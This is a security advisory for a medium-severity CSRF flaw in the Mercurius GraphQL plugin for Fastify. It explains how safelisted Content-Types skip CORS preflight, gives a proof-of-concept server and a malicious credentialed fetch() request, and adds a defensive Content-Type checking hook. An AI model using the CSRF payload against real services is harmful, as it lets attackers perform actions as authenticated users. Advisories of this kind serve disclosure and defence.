CVE-2025-64166

Severity: MEDIUM 5.4 | EPSS 0.01%

Mercurius: Incorrect Content-Type parsing can lead to CSRF attack

Published: 2026/3/5 | Modified: 2026/3/5

Description

### Summary

A Cross-Site Request Forgery (CSRF) vulnerability was identified in Mercurius version 16. The issue arises from incorrect parsing of the `Content-Type` header in requests. Specifically, requests with `Content-Type` values such as `application/x-www-form-urlencoded`, `multipart/form-data`, or `text/plain` could be misinterpreted as `application/json`. Because a browser sends those media types cross-origin without a CORS preflight, this misinterpretation bypasses the preflight checks performed by the `fetch()` API, potentially allowing unauthorized actions to be performed on behalf of an authenticated user.

---

### Impact

An attacker could exploit this vulnerability by crafting a malicious request with a `Content-Type` that Fastify incorrectly parses as `application/json`. When such a request is made from a different origin, it bypasses the Cross-Origin Resource Sharing (CORS) protections, leading to a potential CSRF attack. This could result in unauthorized actions being performed on behalf of an authenticated user without their consent.

---

### Proof of Concept

```javascript
// Server-side Fastify setup
const Fastify = require('fastify');
const mercurius = require('mercurius');

const app = Fastify();

const schema = `
  type Query {
    hello(name: String): String
  }
`;

const resolvers = {
  Query: {
    hello: (_, { name }) => `Hello ${name || 'World'}!`
  }
};

app.register(mercurius, { schema, resolvers });

// Fastify 4+ takes an options object; the callback receives any startup error.
app.listen({ port: 3000 }, (err) => {
  if (err) throw err;
  console.log('Server listening on http://localhost:3000');
});
```

```javascript
// Malicious client-side code: a safelisted Content-Type means no preflight,
// but the body is still treated as JSON by the vulnerable server.
fetch('http://localhost:3000/graphql', {
  method: 'POST',
  body: JSON.stringify({ query: '{ hello(name: "attacker") }' }),
  headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
  credentials: 'include'
});
```

In the above example, the malicious request is crafted to exploit the CSRF vulnerability by using a `Content-Type` that Fastify incorrectly parses as `application/json`.

---

### Mitigation

To address this vulnerability, CSRF protection has been implemented.
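As an added illustration of the defensive check implied by the mitigation (example code written for this page, not Mercurius' own fix; the `rejectNonJsonGraphql` hook name and the `simulate` helper are hypothetical), this strict media-type gate refuses the safelisted content types the advisory names, so a cross-origin POST must carry a real `application/json` header and therefore triggers a CORS preflight:

```javascript
// Added example (not Mercurius' own fix): a strict Content-Type gate for a
// JSON-only GraphQL endpoint. The CORS-safelisted media types below are sent
// cross-site with NO preflight, so treating them as JSON enables the CSRF.

// Media types a browser may POST cross-origin without a CORS preflight.
const CORS_SAFELISTED = new Set([
  'application/x-www-form-urlencoded',
  'multipart/form-data',
  'text/plain',
]);
// Extract the lower-cased "type/subtype" from a Content-Type header value,
// dropping parameters such as "; charset=utf-8". Returns null when absent
// or malformed, so a missing header is never treated as JSON.
function mediaType(contentType) {
  if (typeof contentType !== 'string') return null;
  const type = contentType.split(';', 1)[0].trim().toLowerCase();
  return /^[\w.+-]+\/[\w.+-]+$/.test(type) ? type : null;
}

// Only an exact application/json media type is accepted for GraphQL POSTs.
function isAcceptableGraphqlContentType(contentType) {
  return mediaType(contentType) === 'application/json';
}
// True for requests a browser would send without a preflight.
function isCorsSafelisted(contentType) {
  return CORS_SAFELISTED.has(mediaType(contentType));
}

// Fastify-style preHandler hook (hypothetical name): reject non-JSON POSTs
// with 415 before the body ever reaches the GraphQL executor.
function rejectNonJsonGraphql(request, reply, done) {
  if (request.method === 'POST' &&
      !isAcceptableGraphqlContentType(request.headers['content-type'])) {
    reply.code(415).send({ error: 'Content-Type must be application/json' });
    return;
  }
  done();
}

// Run the hook against an in-memory request/reply so the decision can be
// inspected offline; returns the HTTP status sent, or 'passed' if allowed.
function simulate(method, contentType) {
  const request = { method, headers: { 'content-type': contentType } };
  let status = 'passed';
  const reply = { code(c) { status = c; return this; }, send() { return this; } };
  rejectNonJsonGraphql(request, reply, () => {});
  return status;
}
```

Register the hook with `app.addHook('preHandler', rejectNonJsonGraphql)` on the GraphQL route; the `simulate` helper exists only so the decision can be checked without a running server.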
## References

* https://github.com/mercurius-js/mercurius/pull/1187

Affected packages (1)

CVSS score

| Source | Version | Severity | Vector |
|--------|---------|----------|--------|
| osv | CVSS 3.1 | MEDIUM 5.4 | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N |

Reference links (5)